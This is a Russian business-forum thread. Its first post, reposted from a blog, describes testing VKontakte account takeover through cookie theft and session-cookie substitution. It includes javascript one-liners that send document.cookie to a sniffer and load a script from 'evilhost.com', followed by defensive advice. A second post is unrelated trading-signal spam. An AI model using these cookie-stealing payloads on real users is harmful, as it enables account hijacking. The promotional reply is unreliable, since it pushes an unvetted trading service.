Форум о бизнесе.

Бизнес форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Бизнес форум » Банки, Финансы, Инвестиции » Что такое взлом и возможен ли он!


Что такое взлом и возможен ли он!

Сообщений 1 страница 2 из 2

1

Легко ли взломать страницу вконтакте?

Достаточно часто на просторах рунета, можно встретить объявления типа: Взломаю любой аккаунт социальной сети, взмылю мыло по шустрому.
Взлом страницы вконтакте Да и так, как одна из моих профессий тесно связана  с IT безопасностью, сегодня я решил немного эту тему по развивать.
А именно протестировать возможность взлома страницы вконтакте, посредством подмены параметров файлов cookies.
Специально для этих целей я зарегистрировал два аккаунта vk.соm, естественно вошел в них на разных компах, и сохранил куки.
В качестве клиентской ОС использовал горячо любимый мною Linux, вторая страница была открыта в Opera (на ОС Windows XP) так,
как только этот интернет браузер имеет возможность изменять параметры cookies. В качестве Web сервера использовал LAMP.
Весь тест проводился в локальной сети, с выходом в интернет через прокси сервер. На веб сервере, я по быстрому набросал и разместил PHP скрипт (сниффер),
который принимал клиентские куки, вот такого содержания: Сниффер принимающий кукисы готов, а передавал я их с помощью JavaScript,
вбив в адресную строку: javascript:window.location.href = "http://testing/sniff.php?cookie="+document.cookie; Я не стал полностью автоматизировать
работу клиента, т. к. это уже выходит за рамки моих морально=этических представлений, ибо любой остро желающий может разработать его
самостоятельно. Следующей задачей для меня была подмена уведенных куков. И это оказалось вообще проще простого. Открыв браузер
Опера => Настройки => Общие настройки => Расширенные => Cookies Opera Cookies Я изменил только значение параметра куков remixsid
и сразу же вошел в другой аккаунт Но стоило мне сменить ip адрес, как передо мной во весь экран на рисовалась балалайка
(старая такая: добрая, русская) Тогда я тупо скопировал всю папку C:\Users\Master-It\AppData\Roaming\Opera\Opera\ авторизовавшись
уже в Windows 7, инициируя действия трояна, и опять сменил ip адрес, потом заменил содержимое папок Opera, и опять вошел в (чужой) аккаунт!
И какой из всего этого напрашивается вывод? Да очень простой! Взлом аккаунта очень мало вероятен, если вы переходите по ссылке на какой-то
[сомнительный] сторонний ресурс, но зато он будет возможен при переходе на фейковую страницу. И для этого злоумышленник, как правило использует
социальную инженерию. Т. е. находит метод при котором вы самостоятельно сливаете ему свои данные от страниц социальных сетей. С vk.com не
прокатывают  Brute Force Attack   с использованием утилит жесткого перебора паролей. Ибо после неудачной 3-5 попытки включается капча. В качестве
альтернативы могут выступать вирусы трояны, которые просто воруют пользовательские данные [пачками] пакетами, и отправляют их своим
разработчикам (клиентам). И уж точно, я бы не стал использовать для этих целей какие-то сторонние утилиты, ибо тема бесплатного сыра кажется
мне уже давно избитой, и пользы от него несоизмеримо меньше нежели вреда. Ведь бот нет расширяется с каждым днем в арифметической
прогрессии. Взлом ВКонтакте (vk.com)  и социальная инженерия Сейчас я приведу пример эксплуатации социальной инженерии, для взлома аккаунта vk.com. Многие знают, что в популярной соц. сети имеется огромная база медиа файлов, около 1000 ТБ, но это собственно и не соль, а вот именно соль заключается в том, что многие хотят скачать музыку из соц. сети  вконтакте , и находят для этих целей соответствующие скрипты. Самый банальный скрипт, который незаметно для пользователя, уведет его файлы куки, может выглядеть так: javascript:var sc=document.createElement(‘script’);sc.src=’http://evilhost.com/scripts/evilscript.js?nz=’+Math.random();document.body.appendChild(s);void(0); Естественно, пользователь сам его вставляет в адресную строку браузера, и активирует. Самое интересное, что после этого он еще и скачивает музыку, в то время, как злоумышленник анализирует его файлы cookies. Как защитить свой аккаунт вконтакте от взлома? Вопрос конечно больше риторический, но все же  варианты есть: 1. Не сохранять Cookies и прочие пользовательские данные на жесткий диск. 2. Использовать хороший антивирус + файрвол. 3. Прежде чем нажать на ссылку, смотреть куда она ведет. 4. Во избежание ввода данных на фейковой странице, внимательно смотреть Url в адресной строке браузера. Однако, если вы открываете свою страницу вк из закладок, а в системе изменен файл hosts, то вы будете переброшены на фейковую страницу, при этом url в адресной строке будет без изменений vk.com. 5. Никогда не светить свою реальную почту, которая связана с чем бы то ни было. 6. Не хранить логины и пароли в не зашифрованном виде на локальном компьютере, например в текстовом файле. 7. Создавать сложные пароли с использованием цифр и букв в верхнем и нижнем регистре, а также добавлять спец. символы. 8. Никогда не переходить по почтовым ссылкам. Злоумышленник может с легкостью подделать адрес отправителя почты с помощью PHP скрипта. P.S. Ну и конечно же периодически создавать контрольные точки восстановления Windows. Ну это так, на всякий случай!
Источник материала: http://master-it.biz/hack-vkontakte.html При копировании материала, открытая, индексируемая ссылка на источник ОБЯЗАТЕЛЬНА! С уважением ©э® Master-It.biz

0

2

Торгую по их сигналам полтора месяца, результатом более чем довольна. Больше всего радует то, что совсем не нужно находиться за компьютером, достаточно просто один раз установить их бесплатную программу для автоматизации торговли и она все будет делать сама. Совсем не надо следить за ситуацией на рынке, разными новостями в мире, как многие делают, можно просто отвлечься от всего этого и заниматься своими делами. Короче говоря, всем советую этот сервис, особенно новичкам.

0


Вы здесь » Бизнес форум » Банки, Финансы, Инвестиции » Что такое взлом и возможен ли он!